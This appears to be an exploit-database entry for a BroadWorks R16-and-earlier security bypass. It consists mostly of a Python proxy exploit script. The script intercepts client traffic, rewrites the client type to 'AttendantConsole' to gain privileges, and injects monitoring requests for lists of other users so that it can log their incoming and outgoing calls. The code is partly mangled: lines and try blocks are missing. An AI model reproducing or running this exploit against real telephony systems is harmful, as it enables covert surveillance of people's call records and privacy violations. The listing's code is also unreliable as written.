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- 2010-11-02
BroadWorks - Call Detail Record Security Bypass
source: https://www.securityfocus.com/bid/44597/info
BroadWorks is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and to obtain sensitive information. Successful exploits will enable the attacker to monitor the incoming and outgoing calls of users in other enterprise groups.
BroadWorks versions R16 and prior are vulnerable.
# Nick Freeman | vt [ [email protected] ] May 2k10
# When running the proxy, each request prompts for k, m, i or your input:
# K/Enter - forwards the packet
# m - automodifies the packet (see changeme and automod variables)
# i - prompts for a file containing usernames in the [email protected] format
# input - sends your raw input (i.e., paste an XML message in there)
# When you're auth'd and ready to monitor other users, generate a packet to BroadWorks (address book update for example), select 'i' and specify a file with usernames in it.
import socket, ssl, sys, re, time
from xml.dom import minidom
# define local listening ip, port
lhost = ''
lport = 1111
# define dest host, port, and domain
dhost = ''
dport = 1111
ddomregex = '@serviceprovider\.com.*' # SP's domain name, only regexd
# define automod
changeme = 'CallClient' # the string to automagically change
tothis = 'AttendantConsole' # what you want it to automagically change to
# define injection params
userUid = '' # userUid of YOUR user (with AttendantConsole privs)
applicationId = 'Client License 4'
monitorpacket = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?><BroadsoftDocument protocol="CAP" version="14.0"><command commandType="monitoringUsersRequest"><commandData><user
userType="AttendantConsole" userUid="' + userUid + '"><applicationId>' + applicationId + '</applicationId><monitoring monType="Add"/>QQQQ</user></commandData></command></BroadsoftDocument>'
monUserLine = '<monUser>ZZ</monUser>'
# define logfile
logfile = 'call-logs.txt'
# the listener
ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ls.bind((lhost, lport))
print "+ Bound to port " + `lport`
print "+ Listening..\n"
# the sender
ds = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sds = ssl.wrap_socket(ds)
# start listening
lconn, addr = ls.accept()
print '+ Connected by', addr
# connect to remote host
sds.connect((dhost, dport))
print '+ Connected to remote host'
def local_packetgrab():
ldata = ""
ldata = lconn.recv(2048)
if len(ldata) < 5:
return 'nodata'
# debug
#print ">>>>>>>>>>>>>>>>>>>>>>>>>>\n"
#print "Received data from client:\n"
#print ">>>>>>>>>>>>>>>>>>>>>>>>>>\n"
#print ldata
# We have received some data, lets check if its finished or not
while 1:
line = ""
line = lconn.recv(2048)
# debug
#print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n"
#print "Received more data from client:\n"
#print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n"
#print line
ldata += line
except socket.timeout:
# debug
#print "No additional data received."
# possibly not necessary
if line == "":
except socket.timeout:
# No data received from client
return 'nodata'
if len(ldata) > 5:
print ">>>>>>>>>>>>>>>>>\n"
print "Data from client:\n"
print ">>>>>>>>>>>>>>>>>\n"
print ldata
return ldata
# No data received from client
return 'nodata'
def remote_packetgrab():
ddata = ""
ddata = sds.recv(2048)
# debug
#print "<<<<<<<<<<<<<<<<<<<<<<<<<<\n"
#print "Received data from server:\n"
#print "<<<<<<<<<<<<<<<<<<<<<<<<<<\n"
#print ddata
# We have received from data, lets check if its finished or not
while 1:
dline = ""
dline = sds.recv(2048)
# debug
#print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n"
#print "Received more data from server:\n"
#print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n"
#print dline
ddata += dline
# debug
#print "No additional data received.\n"
# No data received from server
return 'nodata'
if len(ddata) > 5:
print "<<<<<<<<<<<<<<<<<\n"
print "Data from server:\n"
print "<<<<<<<<<<<<<<<<<\n"
print ddata
# do CDR grab
if re.search('callUpdate', ddata):
logme = open(logfile, 'a')
# it be a call packet
xmldoc = minidom.parseString(ddata)
if re.search('remoteTelUri', ddata):
if re.search('\<state\>2', ddata):
# it be an incoming call
callTo = xmldoc.getElementsByTagName('monitoredUserId')[0].toxml()
callTo = re.sub('\<monitoredUserId\>', '', callTo)
callTo = re.sub(ddomregex, '', callTo)
callFrom = xmldoc.getElementsByTagName('remoteTelUri')[0].toxml()
callFrom = re.sub('\<remoteTelUri\>tel\:', '', callFrom)
callFrom = re.sub('\<\/remote.*', '', callFrom)
localtime = time.asctime( time.localtime(time.time()) )
logstring = "[" + localtime + "]: Incoming call to " + callTo + " from " + callFrom + "!\n"
print logstring
if re.search('\<state\>2', ddata):
# it be an outgoing call
callFrom = xmldoc.getElementsByTagName('monitoredUserId')[0].toxml()
callFrom = re.sub('\<monitoredUserId\>', '', callFrom)
callFrom = re.sub(ddomregex, '', callFrom)
callTo = xmldoc.getElementsByTagName('remoteNumber')[0].toxml()
callTo = re.sub('\<remoteNumber\>', '', callTo)
callTo = re.sub('\<\/remote.*', '', callTo)
localtime = time.asctime( time.localtime(time.time()) )
logstring = "[" + localtime + "]: Outgoing call from " + callFrom + " to " + callTo + "!\n"
print logstring
return ddata
# No data received from server
return 'nodata'
def packet_handle(packet):
user_input = raw_input("ACTION: 'k', 'm', 'i' or your input:\n-------------------------------\n")
if user_input == 'k' or user_input == '':
print "Sending request as is..\n"
print "-----------------------\n"
return packet
elif user_input == 'm':
print "Sending auto-modded request..\n"
print "-----------------------------\n"
packet = re.sub(changeme, tothis, packet)
return packet
elif user_input == "i":
filename = raw_input("Input file containing usernames:\n--------------------------------\n");
file = open(filename, 'r')
filename = raw_input("File does not exist. Try again:\n-------------------------------\n")
file_line = 0
injection_input = ''
for each_line in file:
print "Read line: " + each_line
mond_user = re.sub('ZZ', each_line, monUserLine)
injection_input = injection_input + mond_user
file_line = file_line + 1
if file_line >= 100:
evilpacket = re.sub('QQQQ', injection_input, monitorpacket)
print "Sending injection packet.."
print "--------------------------\n"
evilpacket = re.sub('\n', '', evilpacket)
print evilpacket
file_line = 0
# we have now got 100 users to add. send the packet, then continue sorting through users.
if len(injection_input) > 10:
evilpacket = re.sub('QQQQ', injection_input, monitorpacket)
print "Sending injection packet.."
print "--------------------------\n"
evilpacket = re.sub('\n', '', evilpacket)
print evilpacket
# after all injection is done, return initial packet
return packet
print "Sending modified packet..\n"
print "-------------------------\n"
return user_input
while 1:
# Debug
#print "Checking for client packet..\n"
print ">"
local_data = local_packetgrab()
if local_data != 'nodata' and len(local_data) > 5:
lpacket_tosend = packet_handle(local_data)
# Debug
#print "Checking for server packet..\n"
print "<"
remote_data = remote_packetgrab()
if remote_data != 'nodata' and len(remote_data) > 5:
rpacket_tosend = packet_handle(remote_data)
- Источник
- www.exploit-db.com